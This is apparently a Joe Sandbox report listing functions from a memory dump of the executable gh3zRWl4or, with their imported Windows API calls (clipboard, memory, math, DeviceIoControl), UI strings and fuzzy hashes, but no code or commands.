String ID:
API String ID: 321154650-0
Opcode ID: e86c0954d7ccd5c103a6c7657bec9fc1f9f8f7ea36180be09ebcd625d14c0eae
Instruction ID: d4966816e9a7de9793396ecb2765533a1e83d651cd3b00f662e02a18bdca2481
Opcode Fuzzy Hash: e86c0954d7ccd5c103a6c7657bec9fc1f9f8f7ea36180be09ebcd625d14c0eae
Instruction Fuzzy Hash: A4B17323E38BCC81E223A63754865F9E250AFBF385F2DDB23F984756B29F1561D19600

Function 00007FF674152CE0 Relevance: 12.1, APIs: 8, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF674152CEB
GlobalAlloc.KERNEL32 ref: 00007FF674152D5E
GlobalLock.KERNEL32 ref: 00007FF674152D6F
GlobalUnlock.KERNEL32 ref: 00007FF674152DC1
EmptyClipboard.USER32 ref: 00007FF674152DC7
SetClipboardData.USER32 ref: 00007FF674152DD5
GlobalFree.KERNEL32 ref: 00007FF674152DE3
CloseClipboard.USER32 ref: 00007FF674152DE9

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 453615576-0
Opcode ID: a02a1fea358fca85474d043749fc72989d88a7aaf32ba67f2ff618c2e72d0539
Instruction ID: 792c9abc3be2d0233bbb95ca90aad9dea21d2ff53afa7d39e1cf6dfea8fe47e8
Opcode Fuzzy Hash: a02a1fea358fca85474d043749fc72989d88a7aaf32ba67f2ff618c2e72d0539
Instruction Fuzzy Hash: 7831A323A28642C6EB20AF14E4982B9E7A1FF45BD4F084535DA8DC77D5DE7DE481CB00

Function 00007FF67415C550 Relevance: 9.9, APIs: 6, Instructions: 873COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415C75E
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415C7F2
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415C88C
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415C918
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415C9F7
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415D26E

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: d3afc9c69156ae83ae7c5b4b3fb48d42f1e67938515508aa1f2cd4b06cfe98b8
Instruction ID: 06d3e3a8a8ed969cd46f948a41f70e1a8b8ef1756c74cad1ebb5ed77f0da0547
Opcode Fuzzy Hash: d3afc9c69156ae83ae7c5b4b3fb48d42f1e67938515508aa1f2cd4b06cfe98b8
Instruction Fuzzy Hash: 2F924A33924B889AD712CF3794850A9B760FF6E784719DB16EA0867761EF34F1A4DB00

Function 00007FF67418ADB0 Relevance: 9.2, APIs: 6, Instructions: 178COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF67418AE78

Part of subcall function 00007FF67418CF54: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF67418B925,?,?,?,?,?,00007FF674189E95), ref: 00007FF67418CF6E

memset.VCRUNTIME140 ref: 00007FF67418AEFD
DeviceIoControl.KERNEL32 ref: 00007FF67418AFD8
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67418B03A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B075
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B081

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmemset$ControlDevice_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 4066468686-0
Opcode ID: f72ef20bdd7f1135492441298a19737a48d0c8b360f5536cde984f76c2ef3b66
Instruction ID: b3fd72b5af5a6c68c48cc6a987ef4ac4d7a2cbb4b15a9b2e3a350feb8177c316
Opcode Fuzzy Hash: f72ef20bdd7f1135492441298a19737a48d0c8b360f5536cde984f76c2ef3b66
Instruction Fuzzy Hash: 50718023A19B85C6EA10EB15E4883BAA7A4FB84BB4F144735EAAD43BD5DF7CD441C700

Function 00007FF67415D470 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415D66E
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415D6E3
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415D7CF

Strings

(, xrefs: 00007FF67415D9EF

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: sqrtf
String ID: (
API String ID: 321154650-3887548279
Opcode ID: 75f21d2cba43b537a8f849b5b6e11c892af6542dff6bdc6a939638d87d214b05
Instruction ID: 991054a7d476aa75f83b1daafa0cfd2600d2b70fe9eba75a4918c322e621fa73
Opcode Fuzzy Hash: 75f21d2cba43b537a8f849b5b6e11c892af6542dff6bdc6a939638d87d214b05
Instruction Fuzzy Hash: 92127F33924BC88AD312DF3694821ADB361FF6E788B19D712EA1973665DF34B1A1D700

Function 00007FF67414B875 Relevance: 8.3, APIs: 1, Strings: 4, Instructions: 778COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF674153280: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741532B3
Part of subcall function 00007FF674153280: memcpy.VCRUNTIME140 ref: 00007FF6741532CF
Part of subcall function 00007FF674153280: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741532EF

memchr.VCRUNTIME140 ref: 00007FF67414C0FE

Strings

%.*s, xrefs: 00007FF67414C12E
#COLLAPSE, xrefs: 00007FF67414BC95
#CLOSE, xrefs: 00007FF67414BCFC
%*s%.*s, xrefs: 00007FF67414C153

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: freemallocmemchrmemcpy
String ID: %*s%.*s$ %.*s$#CLOSE$#COLLAPSE
API String ID: 3682640872-4275869412
Opcode ID: 664edfe61803f3a136d3773e68ab2719d6c33066771c045ee550462d2ed2a198
Instruction ID: edb5b8fd850bb3dcdb0cdd0f5236df354a0d6f39cf80344dc5b7f99005bff989
Opcode Fuzzy Hash: 664edfe61803f3a136d3773e68ab2719d6c33066771c045ee550462d2ed2a198
Instruction Fuzzy Hash: 8992A433A14A85DBD715DB3A85842F9B7A0FF59788F089735DB18A76A1DF34B0A4CB00

Function 00007FF674158BA0 Relevance: 7.8, APIs: 6, Instructions: 280COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674158C25
memset.VCRUNTIME140 ref: 00007FF674158D1F
memset.VCRUNTIME140 ref: 00007FF674158D38

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memset$malloc
String ID:
API String ID: 1671641884-0
Opcode ID: fb03c8208558c2f210bc6138100784a45dd3842f0495603024a9522a24260a3d
Instruction ID: d2183ca049c3c43022d898f5e969aa48da2300cd6d7c12d24344dbc1a8aa0e8d
Opcode Fuzzy Hash: fb03c8208558c2f210bc6138100784a45dd3842f0495603024a9522a24260a3d
Instruction Fuzzy Hash: A1D1B433A19BC4C6E7559F26D0892B9B3A4FF58784F189631DB48A3764EF38E591CB00

Function 00007FF67416F040 Relevance: 6.5, APIs: 4, Instructions: 451COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416F1FF
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416F232
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416F5DE
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416F64E

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 0720ce1dddcbb673bee487329e21111013dcd7ce74a6c74aaf241786aae20513
Instruction ID: e7923705911f77c9aabf528a524f9e3ee010805b96b9642a2753dd706c445799
Opcode Fuzzy Hash: 0720ce1dddcbb673bee487329e21111013dcd7ce74a6c74aaf241786aae20513
Instruction Fuzzy Hash: E3122B33D29B8DC5E613E63750862B96251AF6E7C0F18CB32ED4DB66A1FF29F5818500

Function 00007FF674163A70 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 347COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140 ref: 00007FF674163BF3
memchr.VCRUNTIME140 ref: 00007FF674163CC1
memchr.VCRUNTIME140 ref: 00007FF674163D9E

Strings

..., xrefs: 00007FF674163A73

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memchr
String ID: ...
API String ID: 3297308162-440645147
Opcode ID: b7821099e3bd34f42a9e73d33b9418ce4c4ec888a19b140f88b71d9a113969a2
Instruction ID: 1ce6be191c162d855253add031b2517a35021ca26f2958a14a92fc2d10b5c228
Opcode Fuzzy Hash: b7821099e3bd34f42a9e73d33b9418ce4c4ec888a19b140f88b71d9a113969a2
Instruction Fuzzy Hash: 58F1D933918BCDC1E2529B3690453F9B350EF6E7C4F189732EA48B65A2EF79E5818701

Function 00007FF67416EA70 Relevance: 6.3, APIs: 4, Instructions: 345COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416EBEA
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416EC0B
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416EF35
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416EF9D

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 94541ddadf6b70f4736226bf363577a1fcb5a8a61429601250559d8446cfd4d8
Instruction ID: 64a924521258af53465181d0411691e2cbf268f87f1dfbae76d6c04eac9d5b29
Opcode Fuzzy Hash: 94541ddadf6b70f4736226bf363577a1fcb5a8a61429601250559d8446cfd4d8
Instruction Fuzzy Hash: 07E10B33D287CDC5E213A73B50861B5A351AF6E784F1DCB32ED48B66A1EF39B5818601

Function 00007FF67416E4B0 Relevance: 6.3, APIs: 4, Instructions: 335COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416E61F
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416E633
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416E991
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67416E9DA

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 17c203b1e4c55c3f3ec891fc1d863e3dd1ebd1f211813fa8a40ce9b006b96184
Instruction ID: 3546a2b1887134373c33e677a72d093008a647d95407da436b4deadfe74be32b
Opcode Fuzzy Hash: 17c203b1e4c55c3f3ec891fc1d863e3dd1ebd1f211813fa8a40ce9b006b96184
Instruction Fuzzy Hash: 11E1FC33D2C7CDC5E263AA3750862B963509F6E784F1DD732ED48B6261EF2AB581C601

Function 00007FF67418D77C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF67418D7A8
GetCurrentThreadId.KERNEL32 ref: 00007FF67418D7B6
GetCurrentProcessId.KERNEL32 ref: 00007FF67418D7C2
QueryPerformanceCounter.KERNEL32 ref: 00007FF67418D7D2

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 60f18c7c5d3d4961b3a9a9f50d80de6ff05bbdb6c75665282ae7b423f7d4f72c
Instruction ID: bb68b42b8cf531c9f994fc513dd619ae1e8a98f5c8f722d4dd431475942f58c7
Opcode Fuzzy Hash: 60f18c7c5d3d4961b3a9a9f50d80de6ff05bbdb6c75665282ae7b423f7d4f72c
Instruction Fuzzy Hash: 22111822B24F05CAEB00AF60E8992B833A4FB19758F440E35DA6D86BA4DF7CD1588340

Function 00007FF67418D900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF674171965), ref: 00007FF67418D926
FormatMessageA.KERNEL32 ref: 00007FF67418D959

Strings

!x-sys-default-locale, xrefs: 00007FF67418D919

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 5766c490712e18cb4f9df816c41169682bcf35e1d620e971acb2807726e2b08e
Instruction ID: 551cab3140dc4c5057bce5338ae2a63961e8e264bd9ff007ae8de044091dc377
Opcode Fuzzy Hash: 5766c490712e18cb4f9df816c41169682bcf35e1d620e971acb2807726e2b08e
Instruction Fuzzy Hash: AB01C473F18781C2E7119B12B48877A6795F7847E4F448035DA8D86A94CF3DD841C700

Function 00007FF674167680 Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

Strings

%.*s, xrefs: 00007FF674167EEE
%*s%.*s, xrefs: 00007FF674167F13

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID: %*s%.*s$ %.*s
API String ID: 0-3400057116
Opcode ID: 44062c0337e9e89fbf0354f03f0c3ba82ed00bcf5dda0f827fcb955a38a98ace
Instruction ID: 114351506b258d1bbbe82920c03c9c631e46b4463e6e78bfae74656aa50c272d
Opcode Fuzzy Hash: 44062c0337e9e89fbf0354f03f0c3ba82ed00bcf5dda0f827fcb955a38a98ace
Instruction Fuzzy Hash: 2D22D433A28685C5E711EB3694882F9B760FF59398F148735DE6C97695EF38E484CB00

Function 00007FF67415A800 Relevance: 4.2, APIs: 3, Instructions: 418COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6741581F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415834C
Part of subcall function 00007FF6741581F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674158379
Part of subcall function 00007FF6741581F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741583A0
Part of subcall function 00007FF6741581F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741583C3

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415ACC7

Part of subcall function 00007FF674159C40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674159CFA

Part of subcall function 00007FF674159250: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674159352

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415AC8B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415ACA6

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: free$ceilffloorfmalloc
String ID:
API String ID: 573317343-0
Opcode ID: fd60ed0ee14cae937050ec17bd871febf5e8869ee0f0ffa18e8cf13fa6505315
Instruction ID: 948262d76f8d23e82f2adc74fb35e226798549ad0ab9f423d94021399867b93e
Opcode Fuzzy Hash: fd60ed0ee14cae937050ec17bd871febf5e8869ee0f0ffa18e8cf13fa6505315
Instruction Fuzzy Hash: B7129E33A18B94CAE311DB35D0856BDB7B4FB59784F158326EE88A3654EF38E591CB00

Function 00007FF674170D80 Relevance: 3.1, APIs: 2, Instructions: 139COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674170E68

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 28a52f2aea4df51de67c91a752e2ac190132dc141f7f38c8bb211a4c0276d771
Instruction ID: dc56781a1acd42e6b77c554b4fcd1a023197f878ceb6894a8ea21ffa63cd17a1
Opcode Fuzzy Hash: 28a52f2aea4df51de67c91a752e2ac190132dc141f7f38c8bb211a4c0276d771
Instruction Fuzzy Hash: 16412A12F3CB8DC6E813A236844A8B9DA416F6A7C8E59D731E94E71791EF2971D28400

Function 00007FF674165220 Relevance: 2.9, Strings: 2, Instructions: 416COMMON

Download Yara Rule

Strings

#SCROLLY, xrefs: 00007FF674165263
#SCROLLX, xrefs: 00007FF674165259

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
